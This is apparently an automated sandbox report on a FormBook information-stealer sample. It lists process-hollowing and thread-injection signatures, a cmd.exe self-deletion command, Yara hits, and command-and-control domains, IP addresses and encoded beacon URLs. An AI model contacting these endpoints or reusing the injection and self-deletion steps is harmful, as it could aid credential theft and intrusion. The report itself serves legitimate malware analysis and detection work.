Source: C:\Windows\explorer.exe Domain query: www.albanyhumanesociety.net
Source: C:\Windows\explorer.exe Domain query: www.muldentaxi.com
Source: C:\Windows\explorer.exe Domain query: www.gofourd.com
Source: C:\Windows\explorer.exe Domain query: www.buraktradingltd.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 64.190.62.111 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.sandybottomsflipflops.com
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\00098765123POIIU.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\00098765123POIIU.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 3440 Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Thread register set: target process: 3440 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 380000 Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\00098765123POIIU.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 642008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' Jump to behavior
Source: explorer.exe, 00000004.00000002.596849934.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.598188389.0000000005480000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000002.596849934.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.598188389.0000000005480000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000002.596849934.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.598188389.0000000005480000.00000002.00000001.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000004.00000002.596849934.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.598188389.0000000005480000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\00098765123POIIU.exe Queries volume information: C:\Users\user\Desktop\00098765123POIIU.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 411893 Sample: 00098765123POIIU.exe Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 31 www.hysjs168.com 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 5 other signatures 2->45 11 00098765123POIIU.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...\00098765123POIIU.exe.log, ASCII 11->29 dropped 55 Writes to foreign memory regions 11->55 57 Allocates memory in foreign processes 11->57 59 Injects a PE file into a foreign processes 11->59 15 RegSvcs.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 2 other signatures 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 33 www.sandybottomsflipflops.com 18->33 35 www.muldentaxi.com 64.190.62.111, 49734, 80 NBS11696US United States 18->35 37 18 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 wlanext.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
198.54.117.217
 parkingpage.namecheap.com United States
22612 NAMECHEAP-NETUS false
160.153.132.205
 bogolacke.com United States
21501 GODADDY-AMSDE true
199.192.23.253
 www.contorig2.com United States
22612 NAMECHEAP-NETUS true
173.236.152.151
 www.buraktradingltd.com United States
26347 DREAMHOST-ASUS true
34.102.136.180
 gofourd.com United States
15169 GOOGLEUS false
64.190.62.111
 www.muldentaxi.com United States
11696 NBS11696US true
172.217.168.83
 ghs.googlehosted.com United States
15169 GOOGLEUS false
45.39.20.158
 www.ytksw.com United States
18779 EGIHOSTINGUS true

Contacted Domains

Name IP Active
www.muldentaxi.com 64.190.62.111 true
gofourd.com 34.102.136.180 true
embraceblm.com 34.102.136.180 true
www.hysjs168.com 182.61.46.180 true
www.buraktradingltd.com 173.236.152.151 true
bogolacke.com 160.153.132.205 true
parkingpage.namecheap.com 198.54.117.217 true
www.ytksw.com 45.39.20.158 true
albanyhumanesociety.net 34.102.136.180 true
ghs.googlehosted.com 172.217.168.83 true
www.contorig2.com 199.192.23.253 true
www.maraitime.com unknown unknown
www.ihdeuruim.com unknown unknown
www.embraceblm.com unknown unknown
www.soccer-yokouchi.club unknown unknown
www.helenafinaltouch.com unknown unknown
www.bogolacke.com unknown unknown
www.albanyhumanesociety.net unknown unknown
www.gofourd.com unknown unknown
www.sandybottomsflipflops.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.bogolacke.com/uv34/?D0Dhj=+vqKyqUCNNB8UOC5vqb0WBoKaqjxAK/4hHhktlBEWoOvrJqCXDBsl1GlrElBRZa3I6kwNHO8pA==&_JB=SL3d2L8 true
  • Avira URL Cloud: safe
 unknown
http://www.muldentaxi.com/uv34/?D0Dhj=I0+BvmO4ljK/nbLycIQPHPNytqxJ+McfjEJZrssF4WFDr3bjf8ExST5+Hjhrql3HpJj1V9F8nQ==&_JB=SL3d2L8 true
  • Avira URL Cloud: safe
 unknown
http://www.embraceblm.com/uv34/?_JB=SL3d2L8&D0Dhj=eNNoAymEF6y0s09AHznbvWkLlOIpJJQGxSgvNiYX7faSVxdWVtwFBOGKoePvfd+8zgTPPgb0Mw== false
  • Avira URL Cloud: safe
 unknown
www.hysjs168.com/uv34/ true
  • Avira URL Cloud: safe
 low
http://www.ihdeuruim.com/uv34/?D0Dhj=zJB2497tyCkLF9DVAXbTh77yBITnH8u2gz7PlO+nNFbEPXoEJKTpFMEIIpupFtT+IJYk9y/VZw==&_JB=SL3d2L8 false
  • Avira URL Cloud: safe
 unknown
http://www.buraktradingltd.com/uv34/?_JB=SL3d2L8&D0Dhj=D75OsDlTHma4nCt/XHhVQTvedHvqJVej3CEGNnFddBs05fHEvG09IitQFVRojVJr/TkJxJHlYg== true
  • Avira URL Cloud: safe
 unknown
http://www.albanyhumanesociety.net/uv34/?_JB=SL3d2L8&D0Dhj=n+Qx4VWs28a7eV8im5Y5Lb9MLKmoTPPxFKEnTVg2IpEKdb6ImeQQO/tB44tc09WLnIG/s9VgcA== false
  • Avira URL Cloud: safe
 unknown
http://www.contorig2.com/uv34/?_JB=SL3d2L8&D0Dhj=PNkuYexmaEbpw3EaQG1gqEXEhReu9m0wSncWUc9u1VG5H+XH3gAiJ6++bzNk4ZSFpS3p79DaPA== true
  • Avira URL Cloud: safe
 unknown
http://www.gofourd.com/uv34/?_JB=SL3d2L8&D0Dhj=JPLVpJ2/QgCmFDz5d9+MEwsOtRSRnv4p4HgKpBtvwLNy+R4nAh4AcVIWdvhB9Yv67aR/bJ0jJQ== false
  • Avira URL Cloud: safe
 unknown
http://www.sandybottomsflipflops.com/uv34/?_JB=SL3d2L8&D0Dhj=/y2QUNCyd1bGxdPjEN+TG3wvArtE+ieT5j9LKQh68qSP5982epgdoI7eXFRWiHaQS6pCkVOSpw== true
  • Avira URL Cloud: safe
 unknown